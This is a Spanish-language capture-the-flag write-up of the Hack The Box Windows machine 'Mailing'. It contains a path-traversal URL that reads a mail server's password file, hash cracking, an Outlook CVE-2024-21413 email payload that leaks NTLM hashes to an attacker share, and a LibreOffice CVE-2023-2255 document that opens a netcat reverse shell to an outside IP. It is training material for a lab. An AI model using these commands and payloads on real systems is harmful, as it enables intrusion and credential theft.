Mailing
OS: Windows
Dificultad: Fácil
Puntos: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.129.13.29 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV -oN nmap.txt 10.129.13.29
Nmap scan report for 10.129.13.29
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
64503/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeracion
En la pagina principal se encuentra un boton para descargar archivos.
Esta funcion es vulnerable a LFI.
Local File Inclusion (LFI)
Podemos obtener el archivo de configuracion de hMailServer a traves del LFI.
http://mailing.htb/download.php?file=../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
Crack Hash
Utilizando crackstation obtenemos el password.
homenetworkingadministrator
Microsoft Outlook RCE (CVE-2024-21413)
Despues de investigar varias cosas se dedujo que posiblemete es vulnerable al CVE-2024-21413 ya que se menciona mucho outlook en el PDF de la funcion de descarga y tenemos un usuario/password para mandar correos. Llegamos al exploit de outlook que nos permitira lekear informacion con el siguiente script:
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.218\doom' --subject 'Test'
Tambien es posible obtenerlo de la siguiente forma que me funciono correctamente.
swaks --auth LOGIN --server mailing.htb --port 587 --to maya@mailing.htb --from administrator@mailing.htb --auth-user administrator@mailing.htb --auth-password homenetworkingadministrator --body '<html><body><a href="file:///\\\\10.10.14.218\\test\\test.rtf!something">CLICK ME</a></body></html>'
responder -I tun0 -v
Usamos John para crackear el password.
┌──(root㉿kali)-[~/htb/Box/Mailing]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
m4y4ngs4ri (maya)
1g 0:00:00:06 DONE (2024-05-07 09:10) 0.1501g/s 890849p/s 890849c/s 890849C/s m61405..m4895621
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Con ese password podemos autenticarnos por winrm.
evil-winrm -i mailing.htb -u 'maya' -p 'm4y4ngs4ri'
Privilege Escalation
En la raiz hay una carpeta llamada Important Documents.
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2024 5:32 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
Tambien en los programas del sistema encontramos LibreOffice instalado en su version 7.4.
*Evil-WinRM* PS C:\> type "Program Files\LibreOffice\readmes\readme_en-US.txt"
======================================================================
LibreOffice 7.4 ReadMe
======================================================================
LibreOffice (CVE-2023-2255)
La version de LibreOffice es vulnerable al siguiente exploit.
Primero subiremos nc.exe a la maquina para obtener una reverse shell.
mkidr c:\temp
upload /root/htb/Box/Mailing/nc.exe c:\temp\
*Evil-WinRM* PS C:\Important documents> dir c:\temp
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2024 3:31 PM 45272 nc.exe
Ahora generaremos nuestro archivo odt.
┌──(root㉿kali)-[~/htb/Box/Mailing/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.218 1234" --output 'doom.odt'
File doom.odt has been created !
Posteriormente lo descargaremos en la maquina en el directorio Important documents.
*Evil-WinRM* PS C:\Important documents> upload /root/htb/Box/Mailing/CVE-2023-2255/doom.odt
Info: Uploading /root/htb/Box/Mailing/CVE-2023-2255/doom.odt to C:\Important documents\doom.odt
Data: 40704 bytes of 40704 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Important documents> dir
Directory: C:\Important documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2024 3:36 PM 30529 doom.odt
Despues de un momento obtenemos nuestra reverse shell.
Este usuario cuenta con todos los privilegios asi que podemos realizar cualquier accion.
Referencias
https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
https://github.com/elweth-sec/CVE-2023-2255
https://github.com/int0x33/nc.exe/blob/master/nc64.exe